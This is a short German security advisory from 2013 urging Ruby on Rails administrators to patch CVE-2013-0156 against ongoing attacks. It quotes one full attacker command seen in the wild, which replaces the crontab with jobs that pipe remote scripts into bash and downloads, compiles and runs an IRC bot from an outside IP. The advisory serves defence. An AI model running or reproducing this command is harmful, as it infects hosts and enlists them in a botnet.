29.05.2013 12:05

Ruby on Rails updaten

Bereits Anfang Jänner haben wir auf Updates für Ruby on Rails hingewiesen mit welchen Lücken (CVE-2013-0156) geschlossen wurden die es Angreifern ermöglichten über speziell formatierte POST-Requests Code einzuschleusen und auszuführen.

Wie Jeff Jarmoc in seinem Blog nun erörtert, ist anscheinend noch immer eine Vielzahl von veralteten RoR-Installationen im Einsatz auf welche es Angreifer nun abgesehen haben und die o.g. Lücke ausnutzen.
Dabei wird versucht folgende Befehle auszuführen:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Dadurch wird der Bot (k.c) heruntergeladen, kompiliert und ausgeführt - der Bot versucht sich daraufhin zu einem IRC-Server auf cvv4you.ru (Dieser ist mittlerweile nicht mehr zu erreichen) zu verbinden um sich neue Befehle abzuholen.

Ich weise nochmal darauf hin, Ruby on Rails-Installationen auf die aktuellen Versionen (3.2.13, 3.1.12, 2.3.18) upzudaten.

Autor: